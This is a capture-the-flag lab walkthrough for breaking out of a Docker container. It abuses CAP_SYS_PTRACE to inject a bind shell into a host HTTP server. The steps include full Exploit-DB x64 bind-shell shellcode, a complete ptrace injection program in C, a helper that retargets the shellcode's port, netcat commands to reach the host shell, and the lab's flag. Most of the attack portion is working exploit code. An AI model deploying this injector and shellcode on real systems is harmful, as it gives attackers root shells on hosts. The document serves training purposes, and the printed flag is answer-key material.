Process Injection Lab Manual

Name Process Injection

URL https://attackdefense.com/challengedetails?cid=1198

Type DevSecOps : Docker Breakouts

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Objective: Break out of the container by performing process injection on the HTTP server
running on the underlying host machine and retrieve the flag kept in the root directory of the
host system!

Solution:

Step 1: Check the capabilities provided to the docker container.

Command: capsh --print

The Current set in the output includes cap_sys_ptrace. With CAP_SYS_PTRACE a process in the
container may PTRACE_ATTACH to any process it can see, not only its own descendants, and read
and write that process's memory and registers. Two conditions still have to hold for the attack
below: the target must be visible to the container (it is, see step 2), and the host's
kernel.yama.ptrace_scope must not be 3, which blocks attaching regardless of capabilities.
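As an added example (not part of the lab manual), the following C program does what capsh --print does for the one bit that matters here: it decodes the CapEff hex mask from /proc/self/status, tests bit 19 (CAP_SYS_PTRACE), and reads the Yama ptrace_scope sysctl that can still block attaching. The two masks mentioned in the comments, 00000000a80425fb for a default Docker container and 00000000a80c25fb once SYS_PTRACE is added, are the usual Docker defaults and an assumption about this lab's configuration, not values taken from the lab's output.

```c
/* Added example: decode a capability mask and check the Yama ptrace policy.
 * Not part of the lab manual. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CAP_SYS_PTRACE 19   /* capability number from <linux/capability.h> */

/* Return 1 if capability `cap` is set in a hex mask such as "00000000a80c25fb"
 * (the format of the CapEff line in /proc/<pid>/status), 0 if it is clear,
 * -1 if the mask does not parse or the capability number is out of range. */
int cap_in_mask(const char *hexmask, int cap)
{
    char *end;
    unsigned long long mask;

    if (cap < 0 || cap > 63)
        return -1;
    errno = 0;
    mask = strtoull(hexmask, &end, 16);
    if (errno != 0 || end == hexmask || (*end != '\0' && *end != '\n'))
        return -1;
    return (int)((mask >> cap) & 1ULL);
}

/* Copy the hex digits of the CapEff line of /proc/self/status into `out`.
 * Returns 0 on success, -1 if the file or the line is missing. */
int read_cap_eff(char *out, size_t outlen)
{
    char line[256];
    FILE *f = fopen("/proc/self/status", "r");
    int found = -1;

    if (!f)
        return -1;
    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, "CapEff:", 7) == 0) {
            const char *p = line + 7;
            while (*p == ' ' || *p == '\t')
                p++;
            snprintf(out, outlen, "%s", p);
            out[strcspn(out, "\n")] = '\0';
            found = 0;
            break;
        }
    }
    fclose(f);
    return found;
}

/* Yama ptrace_scope: 0 = classic ptrace, 1 = only descendants (CAP_SYS_PTRACE
 * bypasses this), 2 = admin only (CAP_SYS_PTRACE required), 3 = no attach at
 * all. Returns -1 if the sysctl is absent (Yama not built in). */
int yama_ptrace_scope(void)
{
    int scope;
    FILE *f = fopen("/proc/sys/kernel/yama/ptrace_scope", "r");

    if (!f)
        return -1;
    if (fscanf(f, "%d", &scope) != 1)
        scope = -1;
    fclose(f);
    return scope;
}

int main(void)
{
    char mask[64];
    int scope = yama_ptrace_scope();
    int has_ptrace;

    if (read_cap_eff(mask, sizeof mask) < 0) {
        perror("CapEff");
        return 1;
    }
    has_ptrace = cap_in_mask(mask, CAP_SYS_PTRACE);
    printf("CapEff=%s CAP_SYS_PTRACE=%s yama.ptrace_scope=%d\n", mask,
           has_ptrace == 1 ? "yes" : "no", scope);
    /* Default Docker CapEff 00000000a80425fb has bit 19 clear; with
     * --cap-add SYS_PTRACE it becomes 00000000a80c25fb (assumed here). */
    if (has_ptrace == 1 && scope != 3)
        puts("PTRACE_ATTACH to any process visible in this PID namespace should succeed");
    else
        puts("ptrace-based injection is not available from here");
    return 0;
}
```

Run it inside the container; the printed verdict is the same conclusion the manual draws from capsh, and the Yama value is the check capsh does not show.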

Step 2: Identify the PID of the HTTP server.

Command: ps -eaf

A Python HTTP server is running on the host machine; its PID is 221. That host processes show
up at all means the container shares the host's PID namespace (as with docker run --pid=host),
which is what puts the server within reach of ptrace from inside the container.

Step 3: Check the architecture of the host machine.

Command: uname -m

The host machine is running 64-bit Linux.

Step 4: Search for publicly available TCP bind shell shellcodes.

Search on Google for "Linux x64 Bind shell shellcode exploit db".

Among the first results is the Exploit DB entry below, a Linux/x64 bind shell shellcode of 87
bytes.

Exploit DB Link: https://www.exploit-db.com/exploits/41128


Shellcode:
"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";

The shellcode issues six syscalls: socket(AF_INET, SOCK_STREAM, 0), bind on port 5600 (the
0x15e0 immediate of mov word [rsp+2], which is sin_port in network byte order), listen, accept,
dup2 of the accepted socket over file descriptors 2, 1 and 0, and execve("/bin//sh"). It never
forks, so once injected the HTTP server stops serving and the first client to connect to TCP
port 5600 on the host gets the shell.
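Before injecting someone else's shellcode it is worth checking its length and listening port against the Exploit DB description rather than trusting it. The following added example (not part of the lab manual or the Exploit DB entry) parses the 87 bytes above: it counts the syscall instructions, locates the port immediate in the mov word [rsp+2], imm16 encoding (opcode bytes 66 c7 44 24 02, immediate stored big-endian because sin_port is in network byte order) and can rewrite it, so the same shellcode can be reused on another port without reassembling it. The alternate port 4444 used in main is an arbitrary choice for illustration.

```c
/* Added example: verify and patch the bind port of the Exploit-DB 41128
 * shellcode. Not part of the lab manual. */
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <stdint.h>

/* Linux/x64 bind shell, TCP/5600, 87 bytes (Exploit-DB 41128). */
static const unsigned char shellcode[] =
    "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05"
    "\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10"
    "\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e"
    "\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
    "\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";

/* Length without the string literal's terminating NUL. */
size_t shellcode_len(void)
{
    return sizeof shellcode - 1;
}

/* Opcode bytes of `mov word [rsp+2], imm16`; the 2-byte port follows them. */
static const unsigned char PORT_MOV[] = { 0x66, 0xc7, 0x44, 0x24, 0x02 };

/* Offset of the 2-byte port immediate, or -1 if the pattern is absent. */
static long port_offset(const unsigned char *sc, size_t len)
{
    for (size_t i = 0; i + sizeof PORT_MOV + 2 <= len; i++)
        if (memcmp(sc + i, PORT_MOV, sizeof PORT_MOV) == 0)
            return (long)(i + sizeof PORT_MOV);
    return -1;
}

/* Listening port encoded in the shellcode (host byte order), or -1. */
int shellcode_port(const unsigned char *sc, size_t len)
{
    long off = port_offset(sc, len);

    if (off < 0)
        return -1;
    return (sc[off] << 8) | sc[off + 1];   /* big-endian on the wire */
}

/* Overwrite the port immediate in place. Returns 0 on success, -1 if absent. */
int set_shellcode_port(unsigned char *sc, size_t len, uint16_t port)
{
    long off = port_offset(sc, len);

    if (off < 0)
        return -1;
    sc[off]     = (unsigned char)(port >> 8);
    sc[off + 1] = (unsigned char)(port & 0xff);
    return 0;
}

/* Number of `syscall` (0f 05) instructions; the bind shell above has six. */
size_t count_syscall_insns(const unsigned char *sc, size_t len)
{
    size_t n = 0;

    for (size_t i = 0; i + 1 < len; i++)
        if (sc[i] == 0x0f && sc[i + 1] == 0x05)
            n++;
    return n;
}

/* Patch a private copy to `port` and read the port back from the copy, so the
 * patch can be verified without modifying the original bytes. Returns -1 on
 * failure. */
int patched_port_roundtrip(uint16_t port)
{
    unsigned char copy[sizeof shellcode];

    memcpy(copy, shellcode, sizeof shellcode);
    if (set_shellcode_port(copy, shellcode_len(), port) < 0)
        return -1;
    return shellcode_port(copy, shellcode_len());
}

int main(void)
{
    printf("length: %zu bytes\n", shellcode_len());
    printf("syscall instructions: %zu\n", count_syscall_insns(shellcode, shellcode_len()));
    printf("bind port: %d\n", shellcode_port(shellcode, shellcode_len()));
    printf("re-targeted copy listens on: %d\n", patched_port_roundtrip(4444));
    return 0;
}
```

The port check is the one that pays for itself: a shellcode reused from a different entry would silently listen somewhere other than the port the manual tells you to connect to in step 9.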

Step 5: Write a program to inject the bind TCP shellcode into the running process.

The C program at the GitHub link given below can be used to inject shellcode into a running
process.

GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c

The shellcode used in that program spawns a local shell in the context of the traced process.
Replace it with the bind shell shellcode from the Exploit DB entry referenced in step 4 so that
the shell is reachable over the network from the container.

Modified Program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <errno.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <sys/user.h>

/* Linux/x64 bind shell on TCP/5600 (Exploit DB 41128), 87 bytes. */
#define SHELLCODE_SIZE 87

static const unsigned char shellcode[] =
"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05"
"\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10"
"\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e"
"\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";

/* Write len bytes of src into the tracee at dst, one long-sized word per
 * PTRACE_POKETEXT. POKETEXT ignores page protections, so this works on the
 * read-only text page that RIP points into. The final partial word is merged
 * with the bytes already there so nothing past the shellcode is clobbered. */
int inject_data (pid_t pid, const unsigned char *src, void *dst, size_t len)
{
  size_t i;

  for (i = 0; i < len; i += sizeof (long))
    {
      long word = 0;
      size_t n = (len - i < sizeof (long)) ? len - i : sizeof (long);
      unsigned char *addr = (unsigned char *) dst + i;

      if (n < sizeof (long))
        {
          errno = 0;
          word = ptrace (PTRACE_PEEKTEXT, pid, addr, NULL);
          if (word == -1 && errno != 0)
            {
              perror ("ptrace(PEEKTEXT)");
              return -1;
            }
        }
      memcpy (&word, src + i, n);
      if (ptrace (PTRACE_POKETEXT, pid, addr, (void *) word) < 0)
        {
          perror ("ptrace(POKETEXT)");
          return -1;
        }
    }
  return 0;
}

int
main (int argc, char *argv[])
{
  pid_t target;
  struct user_regs_struct regs;

  if (argc != 2)
    {
      fprintf (stderr, "Usage:\n\t%s pid\n", argv[0]);
      exit (1);
    }
  target = atoi (argv[1]);
  printf ("+ Tracing process %d\n", target);

  /* Attaching to a process we do not own needs CAP_SYS_PTRACE. */
  if (ptrace (PTRACE_ATTACH, target, NULL, NULL) < 0)
    {
      perror ("ptrace(ATTACH)");
      exit (1);
    }

  printf ("+ Waiting for process...\n");
  /* Wait for the SIGSTOP that PTRACE_ATTACH delivers. */
  if (waitpid (target, NULL, 0) < 0)
    {
      perror ("waitpid");
      exit (1);
    }

  printf ("+ Getting Registers\n");
  if (ptrace (PTRACE_GETREGS, target, NULL, &regs) < 0)
    {
      perror ("ptrace(GETREGS)");
      exit (1);
    }

  /* Inject the code at the current RIP. */
  printf ("+ Injecting shell code at %p\n", (void *) regs.rip);
  if (inject_data (target, shellcode, (void *) regs.rip, SHELLCODE_SIZE) < 0)
    exit (1);

  /* An idle HTTP server is stopped inside a blocking syscall (accept, poll).
   * When it resumes, the kernel restarts that syscall by rewinding RIP by 2,
   * the length of the syscall instruction, so advance RIP by 2 here to land
   * on the first byte of the shellcode. A target stopped outside a syscall
   * would instead begin two bytes into the shellcode. */
  regs.rip += 2;
  printf ("+ Setting instruction pointer to %p\n", (void *) regs.rip);
  if (ptrace (PTRACE_SETREGS, target, NULL, &regs) < 0)
    {
      perror ("ptrace(SETREGS)");
      exit (1);
    }

  printf ("+ Run it!\n");
  /* Detaching resumes the tracee, which now runs the bind shell instead of
   * the HTTP server. */
  if (ptrace (PTRACE_DETACH, target, NULL, NULL) < 0)
    {
      perror ("ptrace(DETACH)");
      exit (1);
    }
  return 0;
}
Save the above program as "inject.c".

Command: cat inject.c

Step 6: Compile the program.

Command: gcc inject.c -o inject

Step 7: Execute the binary and pass it the PID of the HTTP server as an argument.

Command: ./inject 221


Step 8: Find the IP address of the host machine.

Command: ifconfig

The container's address is 172.17.0.2 on Docker's default bridge (docker0), whose address on
the host side is 172.17.0.1, so from the container the bind shell is reachable at
172.17.0.1:5600. If the bridge has been reconfigured, the container's default gateway is the
host address to use.

Command: ip route show default

Step 9: Connect to the bind shell with netcat and check the user id.

Commands:
nc 172.17.0.1 5600
id

Step 10: Retrieve the flag.

Commands:
find / -name flag 2>/dev/null
cat /root/flag

Flag: d8d38cda23b69585710698421c946e2b

References:

1. Docker (https://www.docker.com/)
2. Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes)
   (https://www.exploit-db.com/exploits/41128)
3. Mem Inject (https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c)
